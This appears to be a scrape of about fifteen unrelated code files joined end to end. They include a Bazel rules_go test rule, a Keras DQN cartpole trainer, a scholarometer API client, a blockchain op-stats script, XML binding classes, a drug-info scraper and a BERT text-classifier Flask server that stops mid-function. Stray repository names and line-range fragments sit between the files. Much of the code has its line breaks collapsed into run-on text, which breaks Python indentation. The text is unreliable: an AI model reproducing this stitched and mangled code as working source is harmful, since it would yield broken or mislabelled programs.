lcov_merger.sh. "_lcov_merger": attr.label( executable = True, default = "@io_bazel_rules_go//go/tools/builders:lcov_merger", cfg = "target", ), }, "executable": True, "test": True, "toolchains": ["@io_bazel_rules_go//go:toolchain"], } go_test = rule(**_go_test_kwargs) go_transition_test = go_transition_rule(**_go_test_kwargs) def _recompile_external_deps(go, external_source, internal_archive, library_labels): """Recompiles some archives in order to split internal and external tests. go_test, like 'go test', splits tests into two separate archives: an internal archive ('package foo') and an external archive ('package foo_test'). The library under test is embedded into the internal archive. The external archive may import it and may depend on symbols defined in the internal test files. To avoid conflicts, the library under test must not be linked into the test binary, since the internal test archive embeds the same sources. Libraries imported by the external test that transitively import the library under test must be recompiled too, or the linker will complain that export data they were compiled with doesn't match the export data they are linked with. This function identifies which archives may need to be recompiled, then declares new output files and actions to recompile them. This is an unfortunately an expensive process requiring O(V+E) time and space in the size of the test's dependency graph for each test. Args: go: go object returned by go_context. external_source: GoSource for the external archive. internal_archive: GoArchive for the internal archive. library_labels: labels for embedded libraries under test. Returns: external_soruce: recompiled GoSource for the external archive. If no recompilation is needed, the original GoSource is returned. internal_archive: recompiled GoArchive for the internal archive. If no recompilation is needed, the original GoSource is returned. """ # If no libraries are embedded in the internal archive, then nothing needs # to be recompiled. if not library_labels: return external_source, internal_archive # Build a map from labels to GoArchiveData. # If none of the librares embedded in the internal archive are in the # dependency graph, then nothing needs to be recompiled. 
    arc_data_list = depset(transitive = [get_archive(dep).transitive for dep in external_source.deps]).to_list()
    label_to_arc_data = {a.label: a for a in arc_data_list}
    if all([l not in label_to_arc_data for l in library_labels]):
        return external_source, internal_archive

    # Build a depth-first post-order list of dependencies starting with the
    # external archive. Each archive appears after its dependencies and before
    # its dependents.
    #
    # This is tricky because Starlark doesn't support recursion or while loops.
    # We simulate a while loop by iterating over a list of 2N elements where
    # N is the number of archives. Each archive is pushed onto the stack
    # twice: once before its dependencies are pushed, and once after.

    # dep_list is the post-order list of dependencies we're building.
    dep_list = []

    # stack is a stack of targets to process. We're done when it's empty.
    stack = [get_archive(dep).data.label for dep in external_source.deps]

    # deps_pushed tracks the status of each target.
    # DEPS_UNPROCESSED means the target is on the stack, but its dependencies
    # are not.
    # ON_DEP_LIST means the target and its dependencies have been added to
    # dep_list.
    # Non-negative integers are the number of dependencies on the stack that
    # still need to be processed.
    # A target is on the stack if its status is DEPS_UNPROCESSED or 0.
    DEPS_UNPROCESSED = -1
    ON_DEP_LIST = -2
    deps_pushed = {l: DEPS_UNPROCESSED for l in stack}

    # dependents maps labels to lists of known dependents. When a target is
    # processed, its dependents' deps_pushed count is decremented.
    dependents = {l: [] for l in stack}

    # step is a list to iterate over to simulate a while loop. i tracks
    # iterations.
    step = [None] * (2 * len(arc_data_list))
    i = 0
    for _ in step:
        if len(stack) == 0:
            break
        i += 1
        label = stack.pop()
        if deps_pushed[label] == 0:
            # All deps have been added to dep_list. Append this target to the
            # list. If a dependent is not waiting for anything else, push
            # it back onto the stack.
            dep_list.append(label)
            for p in dependents.get(label, []):
                deps_pushed[p] -= 1
                if deps_pushed[p] == 0:
                    stack.append(p)
            continue

        # deps_pushed[label] == None, indicating we don't know whether this
        # target's dependencies have been processed. Other targets processed
        # earlier may depend on them.
        deps_pushed[label] = 0
        arc_data = label_to_arc_data[label]
        for c in arc_data._dep_labels:
            if c not in deps_pushed:
                # Dependency not seen yet; push it.
                stack.append(c)
                deps_pushed[c] = None
                deps_pushed[label] += 1
                dependents[c] = [label]
            elif deps_pushed[c] != 0:
                # Dependency pushed, not processed; wait for it.
                deps_pushed[label] += 1
                dependents[c].append(label)
        if deps_pushed[label] == 0:
            # No dependencies to wait for; push self.
            stack.append(label)
    if i != len(step):
        fail("assertion failed: iterated %d times instead of %d" % (i, len(step)))

    # Determine which dependencies need to be recompiled because they depend
    # on embedded libraries.
    need_recompile = {}
    for label in dep_list:
        arc_data = label_to_arc_data[label]
        need_recompile[label] = any([
            dep in library_labels or need_recompile[dep]
            for dep in arc_data._dep_labels
        ])

    # Recompile the internal archive without dependencies that need
    # recompilation. This breaks a cycle which occurs because the deps list
    # is shared between the internal and external archive. The internal archive
    # can't import anything that imports itself.
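    #
    # Illustrative example (hypothetical targets, not taken from this rule set):
    # suppose the test embeds //pkg:foo, and the external test package imports
    # //pkg:helper, which itself imports //pkg:foo. helper must be recompiled
    # against the internal test archive, and the internal archive must be
    # recompiled without helper in its deps; otherwise the internal archive
    # would (indirectly) depend on itself, and the linker would see mismatched
    # export data for foo.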
internal_source = internal_archive.source internal_deps = [dep for dep in internal_source.deps if not need_recompile[get_archive(dep).data.label]] attrs = structs.to_dict(internal_source) attrs["deps"] = internal_deps internal_source = GoSource(**attrs) internal_archive = go.archive(go, internal_source, _recompile_suffix = ".recompileinternal") # Build a map from labels to possibly recompiled GoArchives. label_to_archive = {} i = 0 for label in dep_list: i += 1 recompile_suffix = ".recompile%d" % i # If this library is the internal archive, use the recompiled version. if label == internal_archive.data.label: label_to_archive[label] = internal_archive continue # If this is a library embedded into the internal test archive, # use the internal test archive instead. if label in library_labels: label_to_archive[label] = internal_archive continue # Create a stub GoLibrary and GoSource from the archive data. arc_data = label_to_arc_data[label] library = GoLibrary( name = arc_data.name, label = arc_data.label, importpath = arc_data.importpath, importmap = arc_data.importmap, importpath_aliases = arc_data.importpath_aliases, pathtype = arc_data.pathtype, resolve = None, testfilter = None, is_main = False, ) deps = [label_to_archive[d] for d in arc_data._dep_labels] source = GoSource( library = library, mode = go.mode, srcs = as_list(arc_data.srcs), orig_srcs = as_list(arc_data.orig_srcs), orig_src_map = dict(zip(arc_data.srcs, arc_data._orig_src_map)), cover = arc_data._cover, embedsrcs = as_list(arc_data._embedsrcs), x_defs = dict(arc_data._x_defs), deps = deps, gc_goopts = as_list(arc_data._gc_goopts), runfiles = go._ctx.runfiles(files = arc_data.data_files), cgo = arc_data._cgo, cdeps = as_list(arc_data._cdeps), cppopts = as_list(arc_data._cppopts), copts = as_list(arc_data._copts), cxxopts = as_list(arc_data._cxxopts), clinkopts = as_list(arc_data._clinkopts), cgo_exports = as_list(arc_data._cgo_exports), ) # If this archive needs to be recompiled, use go.archive. # Otherwise, create a stub GoArchive, using the original file. if need_recompile[label]: recompile_suffix = ".recompile%d" % i archive = go.archive(go, source, _recompile_suffix = recompile_suffix) else: archive = GoArchive( source = source, data = arc_data, direct = deps, libs = depset(direct = [arc_data.file], transitive = [a.libs for a in deps]), transitive = depset(direct = [arc_data], transitive = [a.transitive for a in deps]), x_defs = source.x_defs, cgo_deps = depset(direct = arc_data._cgo_deps, transitive = [a.cgo_deps for a in deps]), cgo_exports = depset(direct = list(source.cgo_exports), transitive = [a.cgo_exports for a in deps]), runfiles = source.runfiles, mode = go.mode, ) label_to_archive[label] = archive # Finally, we need to replace external_source.deps with the recompiled # archives. 
attrs = structs.to_dict(external_source) attrs["deps"] = [label_to_archive[get_archive(dep).data.label] for dep in external_source.deps] return GoSource(**attrs), internal_archive examples/gazebo_cartpole/gazebo_cartpole_v2.py10-100 import gym import keras import numpy as np import random from gym import wrappers from keras.models import Sequential from keras.layers import Dense from keras.optimizers import Adam from collections import deque import gym_gazebo ACTIONS_DIM = 2 OBSERVATIONS_DIM = 4 MAX_ITERATIONS = 10**6 LEARNING_RATE = 0.001 NUM_EPOCHS = 50 GAMMA = 0.99 REPLAY_MEMORY_SIZE = 1000 NUM_EPISODES = 10000 TARGET_UPDATE_FREQ = 100 MINIBATCH_SIZE = 32 RANDOM_ACTION_DECAY = 0.99 INITIAL_RANDOM_ACTION = 1 class ReplayBuffer(): def __init__(self, max_size): self.max_size = max_size self.transitions = deque() def add(self, observation, action, reward, observation2): if len(self.transitions) > self.max_size: self.transitions.popleft() self.transitions.append((observation, action, reward, observation2)) def sample(self, count): return random.sample(self.transitions, count) def size(self): return len(self.transitions) def get_q(model, observation): np_obs = np.reshape(observation, [-1, OBSERVATIONS_DIM]) return model.predict(np_obs) def train(model, observations, targets): # for i, observation in enumerate(observations): # np_obs = np.reshape(observation, [-1, OBSERVATIONS_DIM]) # print "t: {}, p: {}".format(model.predict(np_obs),targets[i]) # exit(0) np_obs = np.reshape(observations, [-1, OBSERVATIONS_DIM]) np_targets = np.reshape(targets, [-1, ACTIONS_DIM]) model.fit(np_obs, np_targets, epochs=1, verbose=0) def predict(model, observation): np_obs = np.reshape(observation, [-1, OBSERVATIONS_DIM]) return model.predict(np_obs) def get_model(): model = Sequential() model.add(Dense(16, input_shape=(OBSERVATIONS_DIM, ), activation='relu')) model.add(Dense(16, input_shape=(OBSERVATIONS_DIM,), activation='relu')) model.add(Dense(2, activation='linear')) model.compile( optimizer=Adam(lr=LEARNING_RATE), loss='mse', metrics=[], ) return model def update_action(action_model, target_model, sample_transitions): random.shuffle(sample_transitions) batch_observations = [] batch_targets = [] for sample_transition in sample_transitions: old_observation, action, reward, observation = sample_transition targets = np.reshape(get_q(action_model, old_observation), ACTIONS_DIM) targets[action] = reward if observation is not None: predictions = predict(target_model, observation) new_action = np.argmax(predictions) targets[action] += GAMMA * predictions[0, new_action] batch_observations.append(old_observation) batch_targets.append(targets) train(action_model, batch_observations, batch_targets) def main(): steps_until_reset = TARGET_UPDATE_FREQ random_action_probability = INITIAL_RANDOM_ACTION # Initialize replay memory D to capacity N replay = ReplayBuffer(REPLAY_MEMORY_SIZE) # Initialize action-value model with random weights action_model = get_model() # Initialize target model with same weights #target_model = get_model() #target_model.set_weights(action_model.get_weights()) env = gym.make('GazeboCartPole-v0') # env = wrappers.Monitor(env, '/tmp/cartpole-experiment-1') for episode in range(NUM_EPISODES): observation = env.reset() for iteration in range(MAX_ITERATIONS): random_action_probability *= RANDOM_ACTION_DECAY random_action_probability = max(random_action_probability, 0.1) old_observation = observation # if episode % 10 == 0: # env.render() if np.random.random() < random_action_probability: action = 
np.random.choice(range(ACTIONS_DIM)) else: q_values = get_q(action_model, observation) action = np.argmax(q_values) observation, reward, done, info = env.step(action) if done: print ('Episode {}, iterations: {}'.format( episode, iteration )) # print action_model.get_weights() # print target_model.get_weights() #print 'Game finished after {} iterations'.format(iteration) reward = -200 replay.add(old_observation, action, reward, None) break replay.add(old_observation, action, reward, observation) if replay.size() >= MINIBATCH_SIZE: sample_transitions = replay.sample(MINIBATCH_SIZE) update_action(action_model, action_model, sample_transitions) steps_until_reset -= 1 # if steps_until_reset == 0: # target_model.set_weights(action_model.get_weights()) # steps_until_reset = TARGET_UPDATE_FREQ if __name__ == "__main__": main() import pandas as pd import xlrd ''' df = pd.read_excel('hard.xlsx') out = df['字詞名'] output = ['1'] for i in range(len(out)): if len(out[i]) <= 3: output.append(out[i]) #print(len(output)) #print(output) with open('word.txt', 'w') as f: for word in output: f.write("%s\n" % word) ''' df = pd.read_excel('simple.xlsx') print(df) out = df['名詞'] output = ['1'] for i in range(len(df)): output.append(out[i]) print(output) with open('simple.txt', 'w') as f: for word in output: f.write("%s\n" % word)bot/commands/__init__.py1-10 from bot.commands.general import GENERAL_COMMANDS from bot.commands.debug import DEBUG_COMMANDS from bot.commands.admin import ADMIN_COMMANDS as _ADMIN_COMMANDS from config import config as CONFIG COMMANDS = DEBUG_COMMANDS + GENERAL_COMMANDS if CONFIG.APP.DEBUG else GENERAL_COMMANDS ADMIN_COMMANDS = _ADMIN_COMMANDS + COMMANDS __all__ = ( 'COMMANDS', 'ADMIN_COMMANDS', ) """scholarometer.py - single file Python module for accessing scholarometer. Note that this module is designed and tested in Python3. No effort is currently made to support Python 2 """ # pylama:ignore=E128,E501 # TODO: rest of API import logging from urllib.parse import urlunparse, urljoin, quote import requests # External dep from defusedxml.ElementTree import fromstring as xmlparse def _log(): return logging.getLogger('scholarometer') class Config(object): """An instance of this class is an immutable configuration for API call. Currently only our default instance makes sense, so you can just ignore this class. 
""" DEF_SCHEME = 'http' DEF_SERVER = 'scholarometer.indiana.edu' DEF_ROOT = '/api/' def __init__(self, scheme=None, server=None, root=None): """Set up the immutable config.""" self.scheme = scheme or Config.DEF_SCHEME self.server = server or Config.DEF_SERVER self.root = root or Config.DEF_ROOT self.session = requests.Session() def _get_url(self, path, scheme=None, server=None, root=None): baseurl = urlunparse(( scheme or self.scheme, server or self.server, root or self.root, None, None, None )) return urljoin(baseurl, path) def _log_response(self, resp): _log().info( "[%d]: Got %d bytes [First 8: '%s'] encoding:%s (app:%s)", resp.status_code, len(resp.content), resp.content[:8] if resp.content else '', resp.encoding, resp.apparent_encoding ) def relative_get(self, path, api_root=None, params=None, headers=None): """Perform HTTP GET at endpoint path relative to the API root.""" url = self._get_url(path, root=api_root) _log().info("Perfoming GET %s", url) resp = self.session.get(url, params=params, headers=headers) self._log_response(resp) if resp.status_code != 200: resp = None return resp def relative_post(self, path, api_root=None, params=None, data=None, headers=None): """Perform HTTP POST at endpoint path relative to the API root.""" url = self._get_url(path, root=api_root) _log().info("Perfoming POST %s", url) resp = self.session.post(url, params=params, data=data, headers=headers) self._log_response(resp) if resp.status_code != 200: resp = None return resp Config.DEFAULT_CONFIG = Config() class Authors(object): """Provide the authors portion of the API.""" def __init__(self, config=None): """Init the authors API with given config.""" self.config = config or Config.DEFAULT_CONFIG def _author_parse(self, author): if not author: return None else: stats = author.find('statistics') return { 'id': author.attrib['id'], 'lastupdate': author.attrib['lastupdate'], 'names': [n.text for n in author.find('names')], 'article_count': int(stats.find('narticles').text), 'citation_count': int(stats.find('ncitations').text), } def get_by_id(self, id): """Query author by scholarpedia ID: return a single author or None.""" resp = self.config.relative_get('authors/id/' + quote(id)) raw = resp.text if resp and resp.text else None if not raw: return None return self._author_parse(xmlparse(raw)) def get_by_name(self, name): """Query author by name: returns a list of authors.""" resp = self.config.relative_get('authors/name/' + quote(name)) raw = resp.text if resp and resp.text else None if not raw: return [] authors = xmlparse(raw) return [self._author_parse(author) for author in authors] def get_articles_by_id(self, id): """Return all articles published by the given author id.""" resp = self.config.relative_post( 'indexu.cgi', api_root='/cgi-bin/', headers={'Content-Type': 'text/plain;charset=UTF-8'}, data='', params={ 'func': 'arrecords', 'expr': id, 'ver': '4.1.0' } ) if len(resp.text) < 2: return [] # Can't possibly be valid json return resp.json() zzahti/skytools #! 
/usr/bin/env python import sys import re import pkgloader pkgloader.require('skytools', '3.0') import skytools.quoting kwmap = skytools.quoting._ident_kwmap fn = "/opt/src/pgsql/postgresql/src/include/parser/kwlist.h" if len(sys.argv) == 2: fn = sys.argv[1] rc = re.compile(r'PG_KEYWORD[(]"(.*)" , \s* \w+ , \s* (\w+) [)]', re.X) data = open(fn, 'r').read() full_map = {} cur_map = {} print "== new ==" for kw, cat in rc.findall(data): full_map[kw] = 1 if cat == 'UNRESERVED_KEYWORD': continue if cat == 'COL_NAME_KEYWORD': continue cur_map[kw] = 1 if kw not in kwmap: print kw, cat kwmap[kw] = 1 print "== obsolete ==" kws = kwmap.keys() kws.sort() for k in kws: if k not in full_map: print k, '(not in full_map)' elif k not in cur_map: print k, '(not in cur_map)' print "== full list ==" ln = "" for k in kws: ln += '"%s":1, ' % k if len(ln) > 70: print ln.strip() ln = "" print ln.strip() """-m level entry point""" from mand import main if __name__ == "__main__": main() jan25/code_sorted ''' https://leetcode.com/contest/weekly-contest-171/problems/minimum-flips-to-make-a-or-b-equal-to-c/ ''' class Solution: def minFlips(self, a: int, b: int, c: int) -> int: f = 0 while c > 0 or a > 0 or b > 0: cb = c % 2; c >>= 1 ab, bb = a % 2, b % 2 a >>= 1; b >>= 1 if cb == ab | bb: continue if cb == 0: f += ab + bb else: f += 1 return f goatops/handler.py import os import random def handle(req): """handle a request to the function Args: req (str): request body """ dirname = os.path.dirname(__file__) path = os.path.join(dirname, 'goatdata') goatdata = list(open(path, "r")) return random.choice(goatdata) from rest_framework import serializers from .models import Foto class FotoSerializer(serializers.HyperlinkedModelSerializer): class Meta: model = Foto fields = ( 'id', 'name', 'location', 'date', 'image', 'created', 'updated' ) 100-1000 import sys from datetime import datetime, timedelta from prettytable import PrettyTable import argparse from timeit import default_timer as timer import logging from beem.blockchain import Blockchain from beem.block import Block from beem import Hive, Blurt, Steem from beem.utils import parse_time from beem.nodelist import NodeList log = logging.getLogger(__name__) logging.basicConfig(level=logging.INFO) def parse_args(args=None): d = 'Show op type stats for either hive, blurt or steem.' 
parser = argparse.ArgumentParser(description=d) parser.add_argument('blockchain', type=str, nargs='?', default=sys.stdin, help='Blockchain (hive, blurt or steem)') return parser.parse_args(args) def main(args=None): args = parse_args(args) blockchain = args.blockchain nodelist = NodeList() nodelist.update_nodes(weights={"block": 1}) if blockchain == "hive" or blockchain is None: max_batch_size = 50 threading = False thread_num = 16 block_debug = 1000 nodes = nodelist.get_hive_nodes() blk_inst = Hive(node=nodes, num_retries=3, num_retries_call=3, timeout=30) elif blockchain == "blurt": max_batch_size = None threading = False thread_num = 8 block_debug = 20 nodes = ["https://rpc.blurt.buzz/", "https://api.blurt.blog", "https://rpc.blurtworld.com", "https://rpc.blurtworld.com"] blk_inst = Blurt(node=nodes, num_retries=3, num_retries_call=3, timeout=30) elif blockchain == "steem": max_batch_size = 50 threading = False thread_num = 16 block_debug = 1000 nodes = nodelist.get_steem_nodes() blk_inst = Steem(node=nodes, num_retries=3, num_retries_call=3, timeout=30) else: raise Exception("Wrong parameter, can be hive, blurt or steem") print(blk_inst) block_count = 0 total_ops = 0 total_trx = 0 duration_s = 60 * 60 * 1 blocksperday = int(duration_s / 3) blockchain = Blockchain(blockchain_instance=blk_inst, ) current_block_num = blockchain.get_current_block_num() last_block_id = current_block_num - blocksperday last_block = Block(last_block_id, blockchain_instance=blk_inst) stopTime = last_block.time() + timedelta(seconds=duration_s) start = timer() op_stats = {} for entry in blockchain.blocks(start=last_block_id, max_batch_size=max_batch_size, threading=threading, thread_num=thread_num): if "block" in entry: block_time = parse_time(entry["block"]["timestamp"]) else: block_time = entry["timestamp"] if block_time > stopTime: break block_count += 1 if "block" in entry: trxs = entry["block"]["transactions"] else: trxs = entry["transactions"] for tx in trxs: total_trx += 1 for op in tx["operations"]: if "_operation" in op["type"]: op_type = op["type"][:-10] else: op_type = op["type"] if op_type in op_stats: op_stats[op_type] += 1 else: op_stats[op_type] = 1 total_ops += 1 ops_per_day = total_ops / block_count * blocksperday if block_count % (block_debug) == 0: print("%d blocks remaining... 
estimated ops per day: %.1f" % (blocksperday - block_count, ops_per_day)) duration = timer() - start t = PrettyTable(["Type", "Count", "percentage"]) t.align = "l" op_list = [] for o in op_stats: op_list.append({"type": o, "n": op_stats[o], "perc": op_stats[o] / total_ops * 100}) op_list_sorted = sorted(op_list, key=lambda x: x['n'], reverse=True) for op in op_list_sorted: t.add_row([op["type"], op["n"], "%.2f %%" % op["perc"]]) print(t) if __name__ == '__main__': sys.exit(main()) actor/PlantRegistry.py from actor import SimplePlantActor from plant.exception import PlantNotFoundException from plantstorage import PlantStorage plants = {} storage = PlantStorage.PlantStorage() storage.initialize_db() for plant in storage.get_all_plants(): plants[plant.uid] = SimplePlantActor.SimplePlantActor.start( plant.uid, plant.initial_setpoint, plant.fluctuationInPercentage, plant.rampInSeconds) def find_active_plant(uid): try: return plants[uid] except KeyError: raise PlantNotFoundException.PlantNotFoundException("Plant not found in running plants", uid) def add_new_plant(name, capacity, fluctuation, ramp): uid = storage.persist(name, capacity, fluctuation, ramp) plants[uid] = SimplePlantActor.SimplePlantActor.start(uid, capacity, fluctuation, ramp) return uid def delete_plant(uid): storage.destroy(uid) find_active_plant(uid).stop() del (plants[uid])#!/usr/bin/env python # # Generated Tue Jun 29 16:14:16 2004 by generateDS.py. # from __future__ import print_function import sys from xml.dom import minidom from xml.sax import handler, make_parser import xmlbehavior as supermod class xml_behaviorSub(supermod.xml_behavior): def __init__(self, base_impl_url='', behaviors=None): supermod.xml_behavior.__init__(self, base_impl_url, behaviors) def get_class_dictionary(self): return self.classDictionary # # Make a dictionary whose keys are class names and whose # values are the behaviors for that class. 
def make_class_dictionary(self, cleanupNameFunc): self.classDictionary = {} self.behaviors.make_class_dictionary(self.classDictionary, cleanupNameFunc) supermod.xml_behavior.subclass = xml_behaviorSub # end class xml_behaviorSub class behaviorsSub(supermod.behaviors): def __init__(self, behavior=None): supermod.behaviors.__init__(self, behavior) def make_class_dictionary(self, classDictionary, cleanupNameFunc): for behavior in self.behavior: behavior.make_class_dictionary(classDictionary, cleanupNameFunc) supermod.behaviors.subclass = behaviorsSub # end class behaviorsSub class behaviorSub(supermod.behavior): def __init__(self, klass='', name='', return_type='', args=None, impl_url=''): supermod.behavior.__init__(self, klass, name, return_type, args, impl_url) def make_class_dictionary(self, classDictionary, cleanupNameFunc): className = cleanupNameFunc(self.klass) if className not in classDictionary: classDictionary[className] = [] classDictionary[className].append(self) supermod.behavior.subclass = behaviorSub # end class behaviorSub class argsSub(supermod.args): def __init__(self, arg=None): supermod.args.__init__(self, arg) supermod.args.subclass = argsSub # end class argsSub class argSub(supermod.arg): def __init__(self, name='', data_type=''): supermod.arg.__init__(self, name, data_type) supermod.arg.subclass = argSub # end class argSub class ancillariesSub(supermod.ancillaries): def __init__(self, ancillary=None): supermod.ancillaries.__init__(self, ancillary) # # XMLBehaviors # supermod.ancillaries.subclass = ancillariesSub # end class ancillariesSub class ancillarySub(supermod.ancillary): def __init__(self, klass='', role='', return_type='', name='', args=None, impl_url=''): supermod.ancillary.__init__(self, klass, role, return_type, name, args, impl_url) supermod.ancillary.subclass = ancillarySub # end class ancillarySub def saxParse(inFileName): parser = make_parser() documentHandler = supermod.SaxXml_behaviorHandler() parser.setDocumentHandler(documentHandler) parser.parse('file:%s' % inFileName) rootObj = documentHandler.getRoot() #sys.stdout.write('\n') #rootObj.export(sys.stdout, 0) return rootObj def saxParseString(inString): parser = make_parser() documentHandler = supermod.SaxContentHandler() parser.setDocumentHandler(documentHandler) parser.feed(inString) parser.close() rootObj = documentHandler.getRoot() #sys.stdout.write('\n') #rootObj.export(sys.stdout, 0) return rootObj def parse(inFilename): doc = minidom.parse(inFilename) rootNode = doc.childNodes[0] rootObj = supermod.xml_behavior.factory() rootObj.build(rootNode) #sys.stdout.write('\n') #rootObj.export(sys.stdout, 0) doc = None return rootObj def parseString(inString): doc = minidom.parseString(inString) rootNode = doc.childNodes[0] rootObj = supermod.xml_behavior.factory() rootObj.build(rootNode) doc = None #sys.stdout.write('\n') #rootObj.export(sys.stdout, 0) return rootObj def parseLiteral(inFilename): doc = minidom.parse(inFilename) rootNode = doc.childNodes[0] rootObj = supermod.xml_behavior.factory() rootObj.build(rootNode) #sys.stdout.write('from xmlbehavior_sub import *\n\n') #sys.stdout.write('rootObj = xml_behavior(\n') #rootObj.exportLiteral(sys.stdout, 0) #sys.stdout.write(')\n') doc = None return rootObj USAGE_TEXT = """ Usage: python ???.py """ def usage(): print(USAGE_TEXT) sys.exit(-1) def main(): args = sys.argv[1:] if len(args) != 1: usage() infilename = args[0] root = parse(infilename) sys.stdout.write('\n') root.export(sys.stdout, 0) if __name__ == '__main__': main() #import pdb 
#pdb.run('main()')
from lxml import etree
import os
import xlsxwriter


# Get file paths
def get_path(pathname):
    file_name = []
    for root, dirs, files in os.walk(pathname):
        for name in files:
            file_name.append(os.path.join(root, name))
    return file_name


# Extract information
def info_extract(drug_path):
    drug = []
    html = etree.parse(drug_path, etree.HTMLParser())
    info = html.xpath('//div[@class="info-content"]/div[@class="info-left"]')[0]
    # /html/body/div[4]/div[1]/div[3]/div[1]/a
    info_text = info.xpath('//div/div[@class="more-infomation"]/p')
    for t in info_text:
        t = t.xpath('string(.)')
        t = t.replace('\t', '')
        t = t.replace('\r', '')
        t = t.replace('\r', '')
        t = t.replace(' ', '')
        drug.append(t)
    # info_title = info.xpath('//div/div[@class="title"]/a/text()')
    return drug


if __name__ == '__main__':
    path = get_path(r'D:\python\医脉通\医脉通_full.1\西药\代谢及内分泌系统药物(完)')  # change manually
    fw = open("test_3.txt", 'w+', encoding='utf-8')
    for i in path:
        drug_info = info_extract(i)
        for m in drug_info:
            fw.write('\n' + m)  # convert the entry to str
    fw.close()
wordsForDelete = ["bought","what","how","when","where","why","we","we've","i've","buck","bucks","dollars","dollar","home","office","customer","price","budget","fix","i","my","happy","day","overall","days","got","get","delivered","deliver","she","you","u","he","am","mine"]
#print(len(word))
# encoding=utf-8
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "2"
"""
Command-line based online prediction
@Author: Macan ()
"""
import re
import tensorflow as tf
import numpy as np
import codecs
import pickle
import os
from datetime import datetime
from flask import Flask,request
app = Flask(__name__)
from bert_base.bert import tokenization, modeling
from bert_base.train.models import create_classification_model

## some parameters
DO_LOWER_CASE = False
MAX_SEQ_LENGTH = 256
model_dir = '/data/leo/Projects/bert/outputs/Cla_wende_2_v1'
bert_dir = '/data/leo/Projects/bert/models/chinese_L-12_H-768_A-12'
is_training=False
use_one_hot_embeddings=False
batch_size=1

gpu_config = tf.ConfigProto()
gpu_config.gpu_options.allow_growth = True
sess=tf.Session(config=gpu_config)
model=None

global graph
input_ids_p, input_mask_p, label_ids_p, segment_ids_p = None, None, None, None

print('checkpoint path:{}'.format(os.path.join(model_dir, "checkpoint")))
if not os.path.exists(os.path.join(model_dir, "checkpoint")):
    raise Exception("failed to get checkpoint.
going to return ") label2id = {"0":0, "1":1} id2label = {value: key for key, value in label2id.items()} label_list = label2id.keys() num_labels = len(label_list) graph = tf.get_default_graph() with graph.as_default(): print("going to restore checkpoint") #sess.run(tf.global_variables_initializer()) input_ids_p = tf.placeholder(tf.int32, [batch_size, MAX_SEQ_LENGTH], name="input_ids") input_mask_p = tf.placeholder(tf.int32, [batch_size, MAX_SEQ_LENGTH], name="input_mask") bert_config = modeling.BertConfig.from_json_file(os.path.join(bert_dir, 'bert_config.json')) loss, per_example_loss, logits, probabilities = create_classification_model(bert_config=bert_config, is_training=False, input_ids=input_ids_p, input_mask=input_mask_p, segment_ids=None, labels=None, num_labels=num_labels) # pred_ids = tf.argmax(probabilities, axis=-1, output_type=tf.int32, name='pred_ids') # pred_ids = tf.identity(pred_ids, 'pred_ids') # probabilities = tf.identity(probabilities, 'pred_prob') saver = tf.train.Saver() # (total_loss, logits, trans, pred_ids) = create_model( # bert_config=bert_config, is_training=False, input_ids=input_ids_p, input_mask=input_mask_p, segment_ids=None, # labels=None, num_labels=num_labels, use_one_hot_embeddings=False, dropout_rate=1.0) saver = tf.train.Saver() print("model_dir: ",model_dir) saver.restore(sess, tf.train.latest_checkpoint(model_dir)) tokenizer = tokenization.FullTokenizer( vocab_file=os.path.join(bert_dir, 'vocab.txt'), do_lower_case=DO_LOWER_CASE) class InputFeatures(object): """A single set of features of data.""" def __init__(self, input_ids, input_mask, segment_ids, ): self.input_ids = input_ids self.input_mask = input_mask self.segment_ids = segment_ids # self.label_ids = label_ids # self.label_mask = label_mask def convert_single_example(ex_index, example, label_list, max_seq_length, tokenizer, mode): """ 将一个样本进行分析,然后将字转化为id, 标签转化为id,然后结构化到InputFeatures对象中 :param ex_index: index :param example: 一个样本 :param label_list: 标签列表 :param max_seq_length: :param tokenizer: :param mode: :return: """ label_map = {} # 1表示从1开始对label进行index化 for (i, label) in enumerate(label_list, 1): label_map[label] = i # 保存label->index 的map if not os.path.exists(os.path.join(model_dir, 'label2id.pkl')): with codecs.open(os.path.join(model_dir, 'label2id.pkl'), 'wb') as w: pickle.dump(label_map, w) tokens = example # tokens = tokenizer.tokenize(example.text) # 序列截断 if len(tokens) >= max_seq_length - 1: tokens = tokens[0:(max_seq_length - 2)] # -2 的原因是因为序列需要加一个句首和句尾标志 ntokens = [] segment_ids = [] # label_ids = [] ntokens.append("[CLS]") # 句子开始设置CLS 标志 segment_ids.append(0) # append("O") or append("[CLS]") not sure! # label_ids.append(label_map["[CLS]"]) # O OR CLS 没有任何影响,不过我觉得O 会减少标签个数,不过拒收和句尾使用不同的标志来标注,使用LCS 也没毛病 for i, token in enumerate(tokens): ntokens.append(token) segment_ids.append(0) # label_ids.append(0) ntokens.append("[SEP]") # 句尾添加[SEP] 标志 segment_ids.append(0) # append("O") or append("[SEP]") not sure! # label_ids.append(label_map["[SEP]"]) input_ids = tokenizer.convert_tokens_to_ids(ntokens) # 将序列中的字(ntokens)转化为ID形式 input_mask = [1] * len(input_ids) # padding, 使用 while len(input_ids) < max_seq_length: input_ids.append(0) input_mask.append(0) segment_ids.append(0) # we don't concerned about it! 
# label_ids.append(0) ntokens.append("**NULL**") # label_mask.append(0) # print(len(input_ids)) assert len(input_ids) == max_seq_length assert len(input_mask) == max_seq_length assert len(segment_ids) == max_seq_length # assert len(label_ids) == max_seq_length # assert len(label_mask) == max_seq_length # 结构化为一个类 feature = InputFeatures( input_ids=input_ids, input_mask=input_mask, segment_ids=segment_ids, # label_ids=label_ids, # label_mask = label_mask ) return feature def predict(text): """ do online prediction. each time make prediction for one instance. you can change to a batch if you want. :param line: a list. element is: [dummy_label,text_a,text_b] :return: """ def convert(line): feature = convert_single_example(0, line, label_list, MAX_SEQ_LENGTH, tokenizer, 'p') input_ids = np.reshape([feature.input_ids],(batch_size, MAX_SEQ_LENGTH)) input_mask = np.reshape([feature.input_mask],(batch_size, MAX_SEQ_LENGTH)) segment_ids = np.reshape([feature.segment_ids],(batch_size, MAX_SEQ_LENGTH)) # label_ids =np.reshape([feature.label_ids],(batch_size, MAX_SEQ_LENGTH)) return input_ids, input_mask, segment_ids global graph with graph.as_default(): # print(id2label) sentence = text start = datetime.now() sentence = tokenizer.tokenize(sentence) # print('tokenized sentence:{}'.format(sentence)) input_ids, input_mask, segment_ids = convert(sentence) feed_dict = {input_ids_p: input_ids, input_mask_p: input_mask} # run session get current feed_dict result prob = sess.run([probabilities], feed_dict) # print("prob: ", prob) result = prob[0].tolist()[0] # print(result) if result[0] < result[1]: return '1',result[1] else: return '0',result[0] # exit() # pred_label_result = 